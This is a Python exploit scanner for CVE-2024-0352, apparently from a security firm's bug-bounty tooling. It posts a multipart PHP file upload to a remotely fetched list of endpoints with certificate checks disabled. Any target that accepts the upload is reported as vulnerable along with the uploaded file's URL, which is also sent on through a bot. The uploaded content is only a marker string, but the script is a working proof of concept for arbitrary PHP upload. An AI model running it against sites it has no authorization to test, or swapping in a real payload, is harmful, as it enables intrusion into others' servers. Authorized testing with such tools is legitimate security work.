#!/usr/bin/env python

"""
 * CVE-2024-0352
 * CVE-2024-0352 Bug scanner for WebPentesters and Bugbounty Hunters
 *
 * @Developed By Cappricio Securities <https://cappriciosec.com>
 */
 
"""
from cve20240352.includes import bot
from cve20240352.utils import configure
import json
import requests
import urllib.parse
from urllib3.exceptions import InsecureRequestWarning
from urllib.parse import quote
from cve20240352.includes import writefile
from cve20240352.utils import const
from urllib.parse import urlparse

pay = "------WebKitFormBoundarygcflwtei\r\nContent-Disposition: form-data; name=\"file\";filename=\"cappriciosec.php\"\r\nContent-Type: application/x-php\r\n\r\ncappriciosec.com\r\n------WebKitFormBoundarygcflwtei--\r\n"
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def cvescan(url, output):
    try:
        with requests.Session() as session:
            payreq = session.get(const.Data.payloadurl)
            for endpoint in payreq.text.splitlines():
                encode = quote(endpoint)
                if url.endswith('/'):
                    url = url[:-1]
                fullurl = f'{url}/{endpoint}'

                try:
                    response = session.post(
                        fullurl, verify=False, headers=const.Data.rheaders, data=pay,allow_redirects=False, timeout=15)
                    print(f'Checking ===> {fullurl}')
                    if response.status_code == 200 and '"name":"cappriciosec.php"' in response.text:
                        response_json = json.loads(response.text)
                        vurl = response_json['data']['url']
                        outputprint = (
                            f"\n{const.Colors.RED}💸[Vulnerable]{const.Colors.RESET} ======> "
                            f"{const.Colors.BLUE}{url}{const.Colors.RESET} \n"
                            f"{const.Colors.MAGENTA}📸PoC-Url->{const.Colors.BLUE}${const.Colors.RESET} {fullurl}\n\n{const.Colors.BLUE}URL ======> {const.Colors.RESET}{vurl}\n\n")

                        print(outputprint)
                        if configure.check_id() == "Exist":
                            bot.sendmessage(fullurl)
                        if output is not None:
                            writefile.writedata(
                                output, str(f'{fullurl}\n'))
                        break

                except requests.exceptions.RequestException as e:
                    print(
                        f'{const.Colors.MAGENTA}Invalid Domain ->{const.Colors.BLUE}${const.Colors.RESET} {fullurl}: {e}')
    except requests.exceptions.RequestException as e:
        print(f"Check Network Connection: {e}")
